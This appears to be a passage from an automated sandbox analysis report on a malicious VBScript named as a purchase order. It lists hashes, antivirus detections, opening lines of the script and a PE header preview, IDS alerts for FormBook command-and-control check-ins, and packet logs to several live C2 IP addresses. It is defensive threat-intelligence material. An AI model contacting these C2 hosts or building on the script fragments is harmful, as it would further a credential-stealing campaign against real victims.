                              SHA-512:ECCA6CF7559233302A0DC11D315E8C401628D527610AFE052AE3B1B1F25D4985CDAF70CB961CFF9EB6FE5ECAF37D745CE4A19A8709C1E02EE5AAF50916E2BE68
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....kMg..............0.............. ... ...@....@.. ....................................`.................................x ..W....`.......................@......8................................................ ............... ..H............text........ ...................... ..`.reloc.......@......................@..B.rsrc........`......................@..@................. ......H............5...........6.. ...........................................".(.....*....0...........(......*....0..W........~....~(.......,<.E.........-......&..(8...%&(@...%&(....%&o....s............~.....+..*..0...........~.....+..*..0.................*.0...........(....*..0...........(.....*.0..........s....(....(K...%&.....*..0...........~.....+..*..0..O.......( ...%&.......s!...o"...( ...%&.......s!...o#...($...%&..(....%&..(%...%&.....*..0...........(....*..0..........*...
                              File type:ASCII text, with very long lines (64582), with CRLF line terminators
                              Entropy (8bit):5.900140446544773
                              TrID:
                              • Visual Basic Script (13500/0) 100.00%
                              File name:PO_1111101161.vbs
                              File size:624'939 bytes
                              MD5:9311a38007910531ee085752d8f4bb94
                              SHA1:cd22e03275c2688f1600be4c520caaf87d76a4ec
                              SHA256:d4601158ebeec0fe8fd9799a60742222dc74d3eda2b7203f705d8195596bb12b
                              SHA512:dd9a1f2b17a3330ae9155978d13b1466eafb164c3bd496afef7a3c70c5c30969208665c44db3065cd8814cc60adbe74c2878c27e1426a7f0497e79b6fe0d3563
                              SSDEEP:12288:WwzU3E1suuH4LsjF347uzxSynGY+gzIrUEIF3s8uw:WyUBuhKFqqxxnGvgUKuw
                              TLSH:5BD4E0C2FF967B8C3C51C6F5141FAA449DCDACEB4234E6EDD42E364539808910A9F93A
                              File Content Preview:Option Explicit....Const TEMP_FOLDER = 2..Const MIN_SLEEP = 3000..Const MAX_SLEEP = 7000..Const DELETE_SLEEP = 2000..Const EXEC_SLEEP = 5000..Dim logFilePath....Sub Main().. Dim payload, preparedPayload.. Initialize.. payload = GetPayload()..
                              Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-02T15:54:15.558508+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49825 | 156.251.17.224 | 80 | TCP
2024-12-02T15:54:15.558508+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49825 | 156.251.17.224 | 80 | TCP
2024-12-02T15:54:32.780909+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49862 | 129.226.153.85 | 80 | TCP
2024-12-02T15:54:35.448250+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49868 | 129.226.153.85 | 80 | TCP
2024-12-02T15:54:38.104466+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49875 | 129.226.153.85 | 80 | TCP
2024-12-02T15:54:40.854477+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49883 | 129.226.153.85 | 80 | TCP
2024-12-02T15:54:40.854477+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49883 | 129.226.153.85 | 80 | TCP
2024-12-02T15:54:48.458834+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49901 | 47.254.140.255 | 80 | TCP
2024-12-02T15:54:51.148441+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49907 | 47.254.140.255 | 80 | TCP
2024-12-02T15:54:53.921492+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49914 | 47.254.140.255 | 80 | TCP
2024-12-02T15:54:56.495424+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49922 | 47.254.140.255 | 80 | TCP
2024-12-02T15:54:56.495424+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49922 | 47.254.140.255 | 80 | TCP
2024-12-02T15:55:03.753321+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49937 | 208.91.197.27 | 80 | TCP
2024-12-02T15:55:06.426773+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49945 | 208.91.197.27 | 80 | TCP
2024-12-02T15:55:09.123055+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49951 | 208.91.197.27 | 80 | TCP
2024-12-02T15:55:12.428428+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49957 | 208.91.197.27 | 80 | TCP
2024-12-02T15:55:12.428428+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49957 | 208.91.197.27 | 80 | TCP
2024-12-02T15:55:19.954873+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49977 | 104.21.24.198 | 80 | TCP
2024-12-02T15:55:22.669325+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49983 | 104.21.24.198 | 80 | TCP
2024-12-02T15:55:25.315029+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49988 | 104.21.24.198 | 80 | TCP
2024-12-02T15:55:27.961594+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49989 | 104.21.24.198 | 80 | TCP
2024-12-02T15:55:27.961594+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49989 | 104.21.24.198 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 2, 2024 15:54:13.795255899 CET | 49825 | 80 | 192.168.2.7 | 156.251.17.224
Dec 2, 2024 15:54:13.915288925 CET | 80 | 49825 | 156.251.17.224 | 192.168.2.7
Dec 2, 2024 15:54:13.915365934 CET | 49825 | 80 | 192.168.2.7 | 156.251.17.224
Dec 2, 2024 15:54:13.926316023 CET | 49825 | 80 | 192.168.2.7 | 156.251.17.224
Dec 2, 2024 15:54:14.046226025 CET | 80 | 49825 | 156.251.17.224 | 192.168.2.7
Dec 2, 2024 15:54:15.558311939 CET | 80 | 49825 | 156.251.17.224 | 192.168.2.7
Dec 2, 2024 15:54:15.558458090 CET | 80 | 49825 | 156.251.17.224 | 192.168.2.7
Dec 2, 2024 15:54:15.558507919 CET | 49825 | 80 | 192.168.2.7 | 156.251.17.224
Dec 2, 2024 15:54:15.561815023 CET | 49825 | 80 | 192.168.2.7 | 156.251.17.224
Dec 2, 2024 15:54:15.681797981 CET | 80 | 49825 | 156.251.17.224 | 192.168.2.7
Dec 2, 2024 15:54:31.138391018 CET | 49862 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:31.258466959 CET | 80 | 49862 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:31.259043932 CET | 49862 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:31.274709940 CET | 49862 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:31.395004988 CET | 80 | 49862 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:32.780909061 CET | 49862 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:32.863445044 CET | 80 | 49862 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:32.863485098 CET | 80 | 49862 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:32.863497019 CET | 80 | 49862 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:32.863548040 CET | 80 | 49862 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:32.863554001 CET | 49862 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:32.863560915 CET | 80 | 49862 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:32.863595963 CET | 49862 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:32.863600016 CET | 80 | 49862 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:32.863621950 CET | 80 | 49862 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:32.863635063 CET | 80 | 49862 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:32.863641977 CET | 49862 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:32.863663912 CET | 49862 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:32.863687992 CET | 49862 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:32.863879919 CET | 80 | 49862 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:32.863893032 CET | 80 | 49862 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:32.863917112 CET | 49862 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:32.863931894 CET | 49862 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:32.942193031 CET | 80 | 49862 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:32.942277908 CET | 49862 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:33.795574903 CET | 49868 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:33.915513039 CET | 80 | 49868 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:33.915663004 CET | 49868 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:33.932549000 CET | 49868 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:34.052511930 CET | 80 | 49868 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:35.448250055 CET | 49868 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:35.508409977 CET | 80 | 49868 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:35.508445024 CET | 80 | 49868 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:35.508459091 CET | 80 | 49868 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:35.508543968 CET | 80 | 49868 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:35.508557081 CET | 80 | 49868 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:35.508563995 CET | 49868 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:35.508569956 CET | 80 | 49868 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:35.508589983 CET | 80 | 49868 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:35.508642912 CET | 49868 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:35.508770943 CET | 80 | 49868 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:35.508783102 CET | 80 | 49868 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:35.508795977 CET | 80 | 49868 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:35.508815050 CET | 49868 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:35.508845091 CET | 49868 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:35.508845091 CET | 49868 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:35.610219955 CET | 80 | 49868 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:35.610320091 CET | 49868 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:36.467206001 CET | 49875 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:36.587255955 CET | 80 | 49875 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:36.587410927 CET | 49875 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:36.603183031 CET | 49875 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:36.723362923 CET | 80 | 49875 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:36.723382950 CET | 80 | 49875 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:38.104465961 CET | 49875 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:38.225207090 CET | 80 | 49875 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:38.225336075 CET | 49875 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:39.126688957 CET | 49883 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:39.246793032 CET | 80 | 49883 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:39.247014999 CET | 49883 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:39.256793976 CET | 49883 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:39.376750946 CET | 80 | 49883 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:40.854240894 CET | 80 | 49883 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:40.854384899 CET | 80 | 49883 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:40.854398966 CET | 80 | 49883 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:40.854412079 CET | 80 | 49883 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:40.854424953 CET | 80 | 49883 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:40.854438066 CET | 80 | 49883 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:40.854464054 CET | 80 | 49883 | 129.226.153.85 | 192.168.2.7
Dec 2, 2024 15:54:40.854476929 CET | 49883 | 80 | 192.168.2.7 | 129.226.153.85
Dec 2, 2024 15:54:40.854484081 CET | 80 | 49883 | 129.226.153.85 | 192.168.2.7
                              Dec 2, 2024 15:54:40.854499102 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:40.854532003 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:40.854532003 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:40.854959965 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:40.855000019 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:40.974627972 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:40.974669933 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:40.974844933 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.095103025 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.095216990 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.095341921 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.099136114 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.100511074 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.100564003 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.100584984 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.108926058 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.108975887 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.109004974 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.117341995 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.117393017 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.117398977 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.125866890 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.125905037 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.125931978 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.134694099 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.134759903 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.134759903 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.142638922 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.142693043 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.142708063 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.151027918 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.151130915 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.151135921 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.159452915 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.159516096 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.159611940 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.168050051 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.168070078 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.168119907 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.176312923 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.176378012 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.215435028 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.260596037 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.296053886 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.324795008 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.324882984 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.325040102 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.328059912 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.328130007 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.328388929 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.334453106 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.334628105 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.336330891 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.336443901 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.336488008 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.342755079 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.342935085 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.343072891 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.349244118 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.349347115 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.349478006 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.355735064 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.355797052 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.355904102 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.361964941 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.362107992 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.364753008 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.484718084 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:46.947462082 CET4990180192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:47.068362951 CET804990147.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:47.068459988 CET4990180192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:47.180071115 CET4990180192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:47.300810099 CET804990147.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:48.458658934 CET804990147.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:48.458709955 CET804990147.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:48.458719015 CET804990147.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:48.458833933 CET4990180192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:48.682673931 CET4990180192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:49.702234983 CET4990780192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:49.822319984 CET804990747.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:49.822514057 CET4990780192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:49.838357925 CET4990780192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:49.958564043 CET804990747.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:51.148338079 CET804990747.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:51.148392916 CET804990747.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:51.148407936 CET804990747.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:51.148441076 CET4990780192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:51.148473978 CET4990780192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:51.354671955 CET4990780192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:52.379606009 CET4991480192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:52.499829054 CET804991447.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:52.499995947 CET4991480192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:52.516985893 CET4991480192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:52.639034986 CET804991447.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:52.639054060 CET804991447.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:53.921353102 CET804991447.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:53.921370029 CET804991447.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:53.921492100 CET4991480192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:53.932646990 CET804991447.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:53.932734013 CET4991480192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:54.026382923 CET4991480192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:55.045564890 CET4992280192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:55.166939020 CET804992247.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:55.167078972 CET4992280192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:55.176253080 CET4992280192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:55.296164036 CET804992247.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:56.495243073 CET804992247.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:56.495335102 CET804992247.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:56.495383024 CET804992247.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:56.495424032 CET4992280192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:56.495461941 CET4992280192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:56.498915911 CET4992280192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:56.618901968 CET804992247.254.140.255192.168.2.7
                              Dec 2, 2024 15:55:02.424854040 CET4993780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:02.545933962 CET8049937208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:02.546020985 CET4993780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:02.562170982 CET4993780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:02.682379961 CET8049937208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:03.753151894 CET8049937208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:03.753320932 CET4993780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:04.073261023 CET4993780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:04.193156004 CET8049937208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:05.092648029 CET4994580192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:05.212658882 CET8049945208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:05.212810993 CET4994580192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:05.228801012 CET4994580192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:05.349663973 CET8049945208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:06.426681995 CET8049945208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:06.426773071 CET4994580192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:06.745148897 CET4994580192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:06.865273952 CET8049945208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:07.770658016 CET4995180192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:07.890945911 CET8049951208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:07.891031027 CET4995180192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:07.906657934 CET4995180192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:08.026796103 CET8049951208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:08.026844025 CET8049951208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:09.119606972 CET8049951208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:09.123054981 CET4995180192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:09.417010069 CET4995180192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:09.536976099 CET8049951208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:10.437150955 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:10.557063103 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:10.557148933 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:10.568321943 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:10.690251112 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.428277016 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.428318977 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.428421021 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.428427935 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.428471088 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.428482056 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.428499937 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.428654909 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.428668022 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.428678989 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.428685904 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.428690910 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.428719997 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.428725004 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.428751945 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.548871040 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.549029112 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.549114943 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.552789927 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.604465961 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.642792940 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.642921925 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.643023014 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.646667004 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.648293972 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.648338079 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.648421049 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.656672955 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.656730890 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.656747103 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.665070057 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.665129900 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.665211916 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.673480988 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.673496008 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.673536062 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.681873083 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.681940079 CET4995780192.168.2.7208.91.197.27
